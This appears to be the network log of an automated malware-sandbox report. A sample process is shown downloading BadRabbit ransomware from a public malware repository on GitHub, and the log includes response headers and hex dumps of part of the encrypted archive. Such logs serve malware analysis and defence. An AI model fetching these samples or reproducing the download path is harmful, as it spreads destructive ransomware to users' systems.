                                                                                                                                                            Date: Thu, 29 Sep 2022 12:45:43 GMT
                                                                                                                                                            Connection: close


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            141192.168.2.649793140.82.121.3443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:46:21 UTC38121OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/BadRabbit.zip HTTP/1.1
                                                                                                                                                            Host: github.com
                                                                                                                                                            Connection: Keep-Alive


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            142140.82.121.3443192.168.2.649793C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:46:21 UTC38121INHTTP/1.1 302 Found
                                                                                                                                                            Server: GitHub.com
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:46:02 GMT
                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                            Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                            Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                            Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/BadRabbit.zip
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                            Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                            2022-09-29 12:46:21 UTC38122INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                            Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            143192.168.2.649798185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:46:21 UTC38123OUTGET /Endermanch/MalwareDatabase/master/ransomwares/BadRabbit.zip HTTP/1.1
                                                                                                                                                            Host: raw.githubusercontent.com
                                                                                                                                                            Connection: Keep-Alive


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            144185.199.108.133443192.168.2.649798C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:46:21 UTC38124INHTTP/1.1 200 OK
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Length: 402632
                                                                                                                                                            Cache-Control: max-age=300
                                                                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                            Content-Type: application/zip
                                                                                                                                                            ETag: "004f09a50a54351833511d1b99db3436b26a72d8e149d6c13dd20a27fe83f3a9"
                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            X-GitHub-Request-Id: 081E:1220:100920B:1104BA2:633592FF
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:46:21 GMT
                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                            X-Served-By: cache-mxp6964-MXP
                                                                                                                                                            X-Cache: HIT
                                                                                                                                                            X-Cache-Hits: 2
                                                                                                                                                            X-Timer: S1664455582.538034,VS0,VE0
                                                                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            X-Fastly-Request-ID: 6aa5b39ce21e4c29d0ef9e3f7e00066cf7798cd1
                                                                                                                                                            Expires: Thu, 29 Sep 2022 12:51:21 GMT
                                                                                                                                                            Source-Age: 158
                                                                                                                                                            2022-09-29 12:46:21 UTC38124INData Raw: 50 4b 03 04 14 00 01 00 08 00 81 a9 58 4b a5 c9 a1 5f 12 24 06 00 2b be 06 00 18 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 42 61 64 52 61 62 62 69 74 2e 65 78 65 01 be e1 49 53 97 20 1c fa c3 6c 18 29 d1 f4 f7 b9 c1 0f c2 9d 6d e2 a3 7f 5f 80 37 a1 bf 46 53 1e 79 43 c5 68 f0 2d 6f a5 6c bc 0b d3 34 e8 37 46 4f 1d 09 b7 a5 d6 3f 8f 58 ab 3e 2a 6b e8 1c 51 80 2f 2b 06 5f 55 e5 78 40 db b9 ba f4 53 46 d8 d7 32 07 89 19 21 37 5e 46 a7 76 3d 2e 65 bc d2 d4 da f9 17 a2 91 f7 2a 17 53 56 14 07 fc 80 61 6e be 20 45 b9 a6 61 66 fa 0e e1 ab 52 4b 8f 7a 5f 56 4d 81 a4 45 ec fb 8c c3 9b b1 0c 2c 9f ac be 4e 92 81 00 98 1f 9a 78 44 7b 7e 07 bf be 1f 74 1e c3 72 cc ca b4 be 8c f1 ec 6f e7 14 34 c2 be ff d4 80 dc 69 5f 70 f5 e0 9e cf 53 02 80 3a 32 88 09 e4 9a 07 df 28
                                                                                                                                                            Data Ascii: PKXK_$+Endermanch@BadRabbit.exeIS l)m_7FSyCh-ol47FO?X>*kQ/+_Ux@SF2!7^Fv=.e*SVan EafRKz_VME,NxD{~tro4i_pS:2(
                                                                                                                                                            2022-09-29 12:46:21 UTC38126INData Raw: 34 32 65 b6 94 d6 82 b7 43 9e 4a 02 54 b5 35 79 77 8c f9 07 93 82 0a ea 8d ad c0 11 a4 0f c9 18 4d 97 d4 2b 21 fd 14 21 23 bb c3 75 54 09 b7 42 ea 85 01 a0 3e 79 a2 2a 6c 74 b8 19 55 58 7c 91 1c 9a 4b 1f bf c4 2c 5b 94 30 25 67 ea 17 e7 9e b7 9e 75 c0 e0 37 ec f1 7d 83 c9 2a 70 84 d9 f2 17 cd 1b 65 77 e8 15 a9 d6 30 27 03 62 99 43 e8 af e6 f3 37 3b bf 96 93 3e 56 12 2d ad 6a 24 17 4a 24 21 8c 72 90 22 84 ea 46 f9 7f d3 a4 2d 8a 96 aa f4 3b 8b d5 b9 52 93 63 91 ac 36 dd 22 be 4c bd 29 5a d5 f9 9c f2 54 df 96 38 c2 7a 8a a0 2a 54 3e bb 6b 33 fd d0 1a 52 f0 28 20 be 11 ea bd 23 a1 52 46 63 49 47 4c 46 fb 28 cd 1b 46 87 0a c7 dc 90 a8 f1 9d 8a b3 06 02 f8 29 7d 38 1a 36 15 ca 59 e4 4e aa 01 82 e1 63 5c 45 df 81 8e 9c d7 9b bd 14 cf e2 17 1d 97 e1 9b 99 0a c9
                                                                                                                                                            Data Ascii: 42eCJT5ywM+!!#uTB>y*ltUX|K,[0%gu7}*pew0'bC7;>V-j$J$!r"F-;Rc6"L)ZT8z*T>k3R( #RFcIGLF(F)}86YNc\E
                                                                                                                                                            2022-09-29 12:46:21 UTC38127INData Raw: 0b 4e ef f3 6f de 93 7d a5 05 18 9d 45 49 ba f1 95 0a fe e5 1d 2c 3d 8d 9f b6 af 61 be ce 82 20 42 80 de 04 34 af 26 76 84 d9 b0 cd f2 ef 7d dc a0 96 8b e3 64 a3 16 dc d4 c2 dc e9 ab b5 55 06 32 cb 4f f0 b4 5e 63 02 ef 09 6a 9e 96 33 60 33 fe 8c 2a bc 38 61 c9 78 94 53 07 08 47 c4 fa e8 e7 33 bb dd 26 2e f2 f0 de ea d4 a8 f2 f4 b0 0e ed 58 b1 cb a3 dd 1c 2f 51 36 d5 9a db 7a bf 9c 05 95 0a d7 98 b5 6d 98 39 11 bc 35 fb 73 2a 8b 65 75 c1 c8 3a 5d f9 e7 53 79 08 72 37 05 31 50 43 96 46 b9 84 fb 94 4c cb 59 bc ad a5 4d a9 d2 ff fe c9 5c b4 de 43 1f c9 8b 9b d6 95 3a eb f1 c6 ea 6c 5f 18 ee 12 3d 01 e2 ec f1 db ca 1b 3d 5e b4 9e c5 a5 b2 0e 85 46 13 d9 7a 88 59 bd 6d cc fd 87 63 e7 b7 26 93 d5 62 61 25 0e 88 c4 97 f9 43 93 cb 88 94 d0 ad 67 9c 3c 40 b5 cc 8c
                                                                                                                                                            Data Ascii: No}EI,=a B4&v}dU2O^cj3`3*8axSG3&.X/Q6zm95s*eu:]Syr71PCFLYM\C:l_==^FzYmc&ba%Cg<@
                                                                                                                                                            2022-09-29 12:46:21 UTC38128INData Raw: 8c 37 76 69 b4 a5 3e 45 27 e1 53 fb 7b 37 7b bc 8c 6b ab 81 72 b2 d9 c2 3e ea 9f 06 6d cb 02 98 fd c5 2f e6 6b 2c 3e 04 fd 0e a2 13 dc 90 47 67 94 9a 05 6a e2 72 51 6f 79 20 c0 af 9c b6 cd 7e 06 8b 75 f7 f4 5f 72 0e ce b1 55 7e ef e3 99 00 cd d7 da 5d fa 58 4d 5f 79 5b 28 fc 62 1c ae 59 81 43 d0 34 f7 eb e8 eb 32 6c 5e 27 c4 1c ec 02 9c 5d 5a 10 ac c5 8b e3 c2 79 46 de 52 af 04 f8 55 49 89 7e 4b 54 68 e0 6c b3 ac e5 2f c5 fd e2 ec 8d 51 c6 27 e4 30 fe cf 43 87 d9 ac c5 af da 94 77 e6 02 27 5c 83 72 37 b1 af a6 c4 fc 2b 13 dd 23 6b 9a 8d e2 a7 35 9c e2 05 29 79 32 af ba c8 bb b3 8c 60 1f 67 0c 24 c1 75 78 c6 4b 6e 11 4d ab 81 20 38 bd 91 9a fe c7 b9 bb 4a e2 be f0 aa 04 46 61 a9 e8 71 b6 b1 20 b9 a9 3c f3 51 26 1b 5c b0 ee 94 ff 86 61 b9 1d 6c 1b 50 cb 6f
                                                                                                                                                            Data Ascii: 7vi>E'S{7{kr>m/k,>GgjrQoy ~u_rU~]XM_y[(bYC42l^']ZyFRUI~KThl/Q'0Cw'\r7+#k5)y2`g$uxKnM 8JFaq <Q&\alPo
                                                                                                                                                            2022-09-29 12:46:21 UTC38130INData Raw: c1 16 b7 77 97 48 37 28 7a 7b d4 b9 6c c7 17 29 0c 64 76 e8 86 67 1b f2 0e 51 87 a1 b3 07 5a 7b d8 66 cf f5 9a 3c ee 5e 88 07 bf ab 11 17 56 af 41 fa cb e8 fd d3 67 2f 42 83 dc 48 c4 a3 e7 22 d8 94 07 a7 7b 82 18 9e a6 f4 9c 28 2e f6 c1 7b b4 4c 21 da 36 7e 55 de 0b bd 81 0f 22 ad b2 fb 83 1b 3d 13 18 e1 f4 93 25 51 71 61 38 cc 76 6f d4 02 e5 75 59 61 b9 0f cb 08 d6 b9 c4 a5 69 83 80 51 fe b9 dd 2e 06 b5 3b af 1e be 76 e4 e6 ca df 7f 59 5f d4 ea 9d 7a cc d7 40 c8 65 73 e6 62 c8 7a 26 98 7d 22 ec 19 8f e2 bb cb d6 2c c7 69 66 a8 dd eb 4a 81 8f 13 8a ce 05 37 02 a4 27 de a9 3f 24 41 39 93 f5 e8 aa b0 82 82 e3 4d 39 23 54 01 a3 b8 14 ee 64 b4 47 fa 13 fc 5d da e7 b7 59 0e 5b 26 9c fd 12 0d 9c 49 08 f2 f6 5d 75 96 da 33 49 c4 58 47 e6 a7 92 96 08 4e 79 4e 04
                                                                                                                                                            Data Ascii: wH7(z{l)dvgQZ{f<^VAg/BH"{(.{L!6~U"=%Qqa8vouYaiQ.;vY_z@esbz&}",ifJ7'?$A9M9#TdG]Y[&I]u3IXGNyN
                                                                                                                                                            2022-09-29 12:46:21 UTC38131INData Raw: 8b 07 5d 36 1d d5 87 3c 81 4d 8c 76 b4 d1 e6 fe aa 29 36 9b 5f 71 06 5c 95 d2 f1 29 d5 a3 57 eb cd 49 62 2b c8 bb 99 6f 11 f6 1c d8 c2 f0 5c 92 d4 79 70 43 ec 43 f1 1d 25 95 ee bc d8 d1 d0 62 34 d8 f3 03 91 a1 a8 28 43 dc aa 4c f2 88 9b cd ab fc c0 14 11 24 fd 32 33 f8 01 63 62 4b c1 dd ce 23 a7 84 9e 2c 6f db 41 43 cd 7c f5 43 9a 2b 49 29 72 df 5e 61 23 ca ab a6 04 f7 ab e5 2c fc 65 95 dd 78 ec 7d 25 c0 7e d4 16 50 79 3f 70 20 fb 66 92 72 95 ed 50 93 11 14 d8 c7 a0 ba 34 f0 38 2d 7a 5c d3 55 05 a5 74 f0 73 2a 08 1d 18 8c 8c 56 8d 98 41 a0 e8 9a 20 e9 f0 4b 34 3d d5 77 6a d2 95 7b 93 f8 37 46 5c a9 87 78 7c f1 64 9c d9 0e c3 c1 27 43 27 63 16 f1 03 bd e9 4b 17 69 56 12 9b 05 70 e8 62 80 66 23 f1 a1 7f d6 85 92 1c b5 d5 42 03 aa 02 96 41 16 3b e2 bd 96 fc
                                                                                                                                                            Data Ascii: ]6<Mv)6_q\)WIb+o\ypCC%b4(CL$23cbK#,oAC|C+I)r^a#,ex}%~Py?p frP48-z\Uts*VA K4=wj{7F\x|d'C'cKiVpbf#BA;
                                                                                                                                                            2022-09-29 12:46:21 UTC38133INData Raw: 7b 7a 68 e8 33 12 2c 15 40 2c 54 ec 79 9a 52 b7 2f d4 85 2e cc eb 09 9d 4a 52 ff d8 d3 3b c7 ed 0a f3 20 cd 8b a1 b2 65 0d dc dd fb 1a fc bd db 77 35 8c 9b b7 1d c2 13 15 9f 96 1b ea d9 09 de 75 fc d2 50 94 7c 83 52 c4 12 c2 80 bd 30 89 79 fb c8 f6 ca 6f 50 dc ae a5 ae 1b 07 7c 12 e7 e8 9b e9 ef d9 88 12 bb a0 b9 91 82 d0 60 5a ae 0d 7e 28 dd d8 f9 4d 97 ce f3 d6 e4 04 29 53 09 03 b7 54 8b e2 67 09 26 e3 17 06 e5 10 7b 2a 21 9a 55 02 a4 7a 30 f6 f7 c6 c7 42 18 58 78 cd 4d 47 fe 5d 88 7e 04 6c 1a 05 2b 5d 70 e1 b9 56 93 28 5e 28 c5 34 76 58 a9 87 31 02 51 53 c7 e9 e0 db b8 86 73 73 9b 36 86 ff 87 d7 3a 57 d3 73 e6 81 c4 5e 1c 19 3f 0b 6f 2b 36 ab 96 c5 de 84 40 0d 4e 68 68 a9 40 e4 a9 97 75 14 83 79 d2 31 a0 5d c4 67 ec 46 84 b5 d6 ac 45 92 08 ea 0e 0f 66
                                                                                                                                                            Data Ascii: {zh3,@,TyR/.JR; ew5uP|R0yoP|`Z~(M)STg&{*!Uz0BXxMG]~l+]pV(^(4vX1QSss6:Ws^?o+6@Nhh@uy1]gFEf
                                                                                                                                                            2022-09-29 12:46:21 UTC38134INData Raw: d0 2c 20 15 74 1f 26 b4 1e f0 69 f8 78 26 ad 42 87 4a 0f ad a9 6d b7 ab 50 c7 e4 11 d0 9f 9f 2d ce a4 97 74 b5 da a8 61 76 ab 27 1a 8a a6 d2 ea 68 d7 15 97 a7 d7 40 62 60 3d 07 a8 9a 34 4b a8 69 4c 45 2f 50 7c 98 e6 c0 b4 0b 56 00 d5 4b 0f 18 5b 92 27 38 31 31 ea 43 9e 9a 9a 29 88 9c cb 7e 87 5d 79 36 8c 96 7c c3 1c eb 26 13 a1 76 e9 87 f7 ca f1 58 46 22 94 f3 ad bd 29 87 93 af 16 6d 45 67 f5 fb b3 f0 47 28 70 e4 df 8f dd f1 1d 3c b4 77 8c f5 d5 82 8f 16 99 d8 d5 a6 1a 8b 00 23 84 50 66 c9 62 8b a1 7e 7c 6a 3f 8f 12 8c ed ce ab c4 5d b9 30 b4 e7 9e 38 1b 2a 01 b7 47 c9 a4 20 7f b2 be 91 d1 ad 5a ce ac e5 9c 4f c3 15 f7 66 dd 01 95 5e a0 d9 36 11 38 e1 5f 4b cd 59 16 41 e2 71 6a 4e 5f 25 14 75 50 d1 30 bc d5 2b 3f 10 75 c7 4b 21 70 eb 53 b0 21 fa e6 46 b9
                                                                                                                                                            Data Ascii: , t&ix&BJmP-tav'h@b`=4KiLE/P|VK['811C)~]y6|&vXF")mEgG(p<w#Pfb~|j?]08*G ZOf^68_KYAqjN_%uP0+?uK!pS!F
                                                                                                                                                            2022-09-29 12:46:21 UTC38135INData Raw: 38 23 b6 e1 9c b9 61 ba 53 89 fe 4d 8b c1 de 1d 7f c9 0f 04 9c 2c 7d 8d c7 18 a4 bd dc a5 be 45 62 9c f5 4f 28 6f 3c ff 87 3f 4b 87 45 de 4f 8f 1d fe bd 02 a8 12 63 0d e0 58 c7 43 ca a3 e0 46 16 d6 45 1b ab a7 94 ec e6 76 0f da 15 da 0a b4 f9 fb 2f 8a 85 c0 19 28 46 b3 52 30 21 5c 87 79 34 e7 9a d7 74 59 c8 02 66 7c 43 ad cb 7a 18 6d 67 30 3f 78 3b 58 71 30 e0 7f ff 9d 23 69 00 f1 39 47 e3 88 15 95 50 6f a7 0e 04 63 36 0b eb 22 60 ee f4 5a a2 f1 df b8 3a b1 ae 8b 96 98 2d af d1 d7 2e 1c 30 b1 26 8b 3f ee d5 0b cb f2 4f ff 60 e4 15 14 ae c1 9b b0 fa b1 05 63 74 df d1 03 9e 22 35 29 92 ae 26 48 49 2c 76 87 bc ab e5 18 c0 d1 dd c2 3a 96 6b 3b 7c a8 aa 8a cc e9 6d ce 54 fe 1d dc cf 6e 08 3a a6 b3 d0 1c 3c 21 ba 23 ca 81 e8 c9 f6 17 d3 4a 9f b4 5f 70 86 39 c8
                                                                                                                                                            Data Ascii: 8#aSM,}EbO(o<?KEOcXCFEv/(FR0!\y4tYf|Czmg0?x;Xq0#i9GPoc6"`Z:-.0&?O`ct"5)&HI,v:k;|mTn:<!#J_p9
                                                                                                                                                            2022-09-29 12:46:21 UTC38137INData Raw: 3d 0d 53 dd 1d dc 12 35 25 bc 25 53 c5 74 6f ac 4f 14 b9 e3 67 de da e3 c8 0a e4 83 0e 06 23 ed 40 0c bb fd 86 92 fe b8 df e6 5a 41 34 9c 2d f2 d2 0b ae a2 85 51 dd 6d 90 f6 2c 8f 9a 0f 04 eb cd 23 1f 97 f5 f1 4e 0f 63 45 4e f3 72 a5 0c 3f 7c 9c d7 5c d2 55 cf 97 5b 77 82 4b 04 60 62 28 62 87 1f ff e8 cb 2e 58 06 7a a1 5a 77 37 f0 68 6d 8b c6 41 3b b9 f0 da e9 7b 5e 5b da 76 28 69 bf b4 b9 a3 da 65 56 41 23 70 f8 05 4b b2 f4 42 18 3d 6f 74 a3 02 82 6c 84 bd 42 30 18 aa 6c 50 ff c3 23 a9 ad cd 50 b9 8b a7 b2 40 b3 c7 49 ee 17 0c e5 ef 59 3c 42 e1 28 23 68 f9 47 48 37 be 08 40 c3 7c 2a 87 a4 04 4b 71 9e 79 0b d8 a9 a9 1f 2f 56 d6 46 56 9f 6f aa 8e d0 ce 4b 1a dd 4c e9 6f 10 49 d7 bd ae 53 d5 70 94 f2 06 00 be 74 78 71 8d 4f 0b 5c 29 cb 33 94 14 e7 c7 b3 62
                                                                                                                                                            Data Ascii: =S5%%StoOg#@ZA4-Qm,#NcENr?|\U[wK`b(b.XzZw7hmA;{^[v(ieVA#pKB=otlB0lP#P@IY<B(#hGH7@|*Kqy/VFVoKLoISptxqO\)3b
                                                                                                                                                            2022-09-29 12:46:21 UTC38138INData Raw: 9a 4b ac 49 ab e2 1c 36 bb 0b e4 6e a6 23 ec 6c 14 5d 30 68 e1 d2 47 84 02 c0 39 aa dd 08 5e 3e 4b 4b 33 83 fa c1 c1 2c f5 98 d1 49 9e a7 97 91 53 62 32 af fb 6b b9 9a 99 d2 f9 8d 6e d1 9e 67 80 8b ce 7b d9 87 b8 c3 25 f9 99 a3 1a dd 4a da 04 d8 20 03 76 86 48 a1 8c bc cf ad 78 f5 c9 ca 93 a6 8a 77 25 9f 01 e3 40 24 b7 08 8e 30 68 e9 dd 84 fc 30 8a 67 b5 61 3f f6 e1 bf 21 48 0e 5e 0c 33 9d 54 17 d7 b1 25 27 29 32 38 10 3d 9f 6d 35 5d 30 d0 f6 0b 6d 1f 59 11 e5 69 03 ab c9 bb b9 cb 0f 45 0f 84 e6 35 3e 38 9b 49 d5 8f b3 76 81 39 ad 13 14 8d 84 f1 7e 49 c7 e0 34 01 4e 02 96 32 a8 30 26 53 3b d3 83 9f 5e c4 cc 5f 98 3a 3e 1e 22 2b 91 30 82 7a b6 8a 93 d5 3b 41 92 ed 16 0d ff e6 51 d3 dd 0f 3c 8b 14 86 6f 6e 28 41 a1 37 11 1d e0 8b 44 30 93 44 c5 82 3a 99 b7
                                                                                                                                                            Data Ascii: KI6n#l]0hG9^>KK3,ISb2kng{%J vHxw%@$0h0ga?!H^3T%')28=m5]0mYiE5>8Iv9~I4N20&S;^_:>"+0z;AQ<on(A7D0D:
                                                                                                                                                            2022-09-29 12:46:21 UTC38139INData Raw: ac 9c 8c 93 a9 2a c3 a4 30 fb 7f 88 81 83 37 66 5a c5 3a a1 59 e9 3d 3e 2d ea 91 8e ad 73 f6 ea 0c 61 50 8a 93 85 f5 57 fe 6d 84 af f0 af 77 f1 45 ec 3d 56 9e c1 72 4b 48 14 8b a4 39 8e 3d c4 ed 55 17 a3 c5 f2 00 3f 1c 21 9d 0c bd f3 4f bc 74 1c 22 7c 16 15 30 95 0a 4c f7 fa 91 9c ed a8 8b 10 b9 d8 ba f1 ba 67 fb 7c 5a b9 16 3f 5e 79 68 0f 3f 66 3e e6 02 37 d7 90 1e 51 3f cf 16 e3 f8 6c 3c 9f 1c ff 46 10 16 ef de 78 cf 1c b7 1a 3e 85 39 84 ea a6 36 ca 78 5c 33 42 a3 9b 60 b4 5f fd 1b 5e 42 1a 60 24 6f 54 41 6b ea a3 ef 63 7f 05 94 85 cc 3a 1d 75 a1 34 16 57 a5 dc d9 46 7b a5 b2 e2 4c db e3 07 19 cd e7 c7 6c 3e dd a2 29 89 de 79 d4 c8 a5 13 42 a4 fe e6 9a d0 d0 0c d1 16 9a 2c 61 45 49 d3 7a a0 0c 4e c5 3f fd 14 6f 37 49 fa bf 8e 6b 79 38 3b 60 aa d2 c3 55
                                                                                                                                                            Data Ascii: *07fZ:Y=>-saPWmwE=VrKH9=U?!Ot"|0Lg|Z?^yh?f>7Q?l<Fx>96x\3B`_^B`$oTAkc:u4WF{Ll>)yB,aEIzN?o7Iky8;`U
                                                                                                                                                            2022-09-29 12:46:21 UTC38140INData Raw: 08 57 09 89 3b 60 2f da 39 06 cc 7c 81 d8 a0 d4 b0 f0 13 a4 5e 5f 3d b2 31 1e f7 44 d5 ca 34 94 53 1d 74 b1 05 98 b5 1f a2 3c 71 c7 63 2d b3 cd 20 54 b3 f5 31 04 10 b3 6a d4 fd 5a e2 b4 8f 99 53 84 17 b9 17 94 68 c1 a0 a5 7a 9e a0 d2 ac ed 0d 0b 53 18 bd e7 3e 04 29 2f 6f ad 81 39 02 e2 fe b7 da 24 92 2f db b5 6c 27 f2 d8 61 76 12 c7 09 b5 8f fb e1 26 4a ad 5a 7d bb 1f ed eb a3 06 0d 31 4f 45 c2 a6 46 b3 b8 82 09 4d 90 43 76 f7 64 7a e0 b0 2f 35 9e 39 bd 9e 38 c8 e4 fc 17 68 62 2b 05 ae 8e d6 55 60 f3 41 26 ab 7c 39 ca 53 eb bb 59 4d 6f 68 f7 66 a5 0b 31 e2 9a 59 f7 d1 b6 3e 4d 9c a2 2c dd 28 ea 68 2c 62 32 80 32 17 3a 2e 9e 71 d5 8f 75 8a 0a 8d 2d 38 0c 4e 11 b6 20 c4 51 56 42 c4 02 ce 48 eb a5 75 01 0a 05 22 ce 17 e0 bc 1c a9 31 85 59 44 4a df 46 b8 a2
                                                                                                                                                            Data Ascii: W;`/9|^_=1D4St<qc- T1jZShzS>)/o9$/l'av&JZ}1OEFMCvdz/598hb+U`A&|9SYMohf1Y>M,(h,b22:.qu-8N QVBHu"1YDJF
                                                                                                                                                            2022-09-29 12:46:21 UTC38156INData Raw: a2 3a 2f bf c2 a3 8b 73 33 8d d1 5c bf b8 bf 30 eb 9e 89 a6 0a c9 5c a1 61 a8 37 dc d3 d3 73 29 a7 d8 09 01 2e 5c 25 cc e4 6c 6d a9 16 7e 50 07 f9 e6 d5 a3 68 cd 85 c8 29 dd 7d 46 ea 36 fb 71 fb d5 17 84 4a 13 9e 75 dc 24 22 93 96 d1 a3 41 33 95 3c d4 53 45 bf d2 36 69 79 b1 f8 b2 92 41 e6 80 9c 6f 1b 63 cc 39 07 af bb a5 ac cf 17 53 b8 50 da 6c d0 22 79 ad 16 ad 5d 6b c1 b8 ba c5 ee 0f 1e 12 00 74 8b f3 ac 63 dc 91 d9 56 48 7d 19 79 6b c8 8c 39 ad 3d 9d 75 f9 01 24 ca 39 f5 02 85 1a de 66 e0 31 9a 81 28 c9 6f 83 c2 6e fc 59 b0 8c 46 18 1c 3f bd b8 41 08 14 76 41 18 83 1c 8c c6 50 37 29 01 ec 92 de b4 87 07 6f f3 b8 1b 1d 05 81 b7 5e 21 58 5b 5c fb 6b 36 b5 0d 95 42 fb 6a 1f 6e d0 53 9f ee 1c 20 c5 e7 77 71 e1 90 26 ad aa ed 45 59 c2 34 bc 32 c3 58 22 50
                                                                                                                                                            Data Ascii: :/s3\0\a7s).\%lm~Ph)}F6qJu$"A3<SE6iyAoc9SPl"y]ktcVH}yk9=u$9f1(onYF?AvAP7)o^!X[\k6BjnS wq&EY42X"P
                                                                                                                                                            2022-09-29 12:46:21 UTC38172INData Raw: 17 3f c2 33 9c a4 f5 61 71 9b f0 a3 66 76 29 03 59 ec d7 60 47 f5 f9 d9 76 2e a8 01 fe 24 41 ca 6c 0b 96 45 47 df 38 80 47 2b 0b c9 ee 59 1b 47 8f c9 0a fa 46 e5 c2 31 ca b5 01 a7 27 0f 3a 46 79 d6 9f d9 9a 85 3a 3f 84 08 cf b5 bd 35 c3 13 1a 98 00 d0 8e e1 71 43 9b f7 59 8d f4 57 27 79 27 9b d0 1b 46 f8 a7 8d cc 97 1e ac 36 89 10 3f c4 6a 1f a6 82 8e c2 18 ea 2f 30 df b9 73 03 06 e8 76 74 54 a1 c2 56 58 fb ca 02 70 1b a4 8a 9b fc 4e 81 cb 7f e4 49 55 d7 ca 43 b1 78 63 b5 d0 42 d4 4c 1c 76 aa d5 b7 db 50 7b b7 98 45 7c ee f4 e8 53 6e 2a f9 c3 13 dc 2d d6 aa f8 f0 51 b5 53 73 e5 8e 7c 56 64 69 a9 cf 96 ed 4c bb f8 e5 0e f1 a3 a0 c9 60 31 fb 15 ee d6 80 6f d6 54 20 12 63 df 17 14 5f 7c 46 c9 6e 48 f3 5a 90 38 39 ac 45 52 a9 67 b8 43 a2 78 96 b6 5c bc 63 0e
                                                                                                                                                            Data Ascii: ?3aqfv)Y`Gv.$AlEG8G+YGF1':Fy:?5qCYW'y'F6?j/0svtTVXpNIUCxcBLvP{E|Sn*-QSs|VdiL`1oT c_|FnHZ89ERgCx\c
                                                                                                                                                            2022-09-29 12:46:21 UTC38188INData Raw: 85 fc a4 ac f1 3c 8d 2d 70 20 41 b3 3a d5 bb 30 04 e0 cc 85 c1 6a ae bf 8a 7b a3 28 e7 ea ed dc c8 24 ee 73 45 42 d9 47 37 27 fb 49 cc fe 97 38 f4 33 fe a5 73 7c e8 9e c2 b5 73 95 30 85 18 39 dc f1 02 08 7d eb 76 75 95 35 c9 53 f0 3a 88 b3 63 f7 52 cc 3a d8 02 39 c6 e3 fb ce 21 c5 53 ff ae 48 48 bf 9e 8b bf 96 63 07 ad 8c 90 fd 6c 4f e6 06 7e 27 75 26 96 81 ec d9 08 30 e9 e1 b7 cd 43 c7 c6 e1 63 c1 01 46 6f 75 8b 82 43 1f b2 6d 6e ad 0f 72 0f f5 84 63 7b 29 1d bb a5 7f 9b 31 bd 78 fa 88 66 5a ca 2f 5f fb 3b 79 0c b3 21 2b d2 4f ef 53 52 79 27 58 ab e6 8d de 84 0b c2 40 19 04 20 83 87 d5 bb 39 56 6b 89 f0 9d 4a 1e 36 f9 8b 4c 09 b2 b4 b1 b7 11 c8 09 8c fb 1c fe 29 91 52 83 d4 61 0b 52 54 02 ff ed 1f 95 1d 2f 99 fb 30 24 45 1d fd 1b 79 f1 41 71 c5 25 7a d0
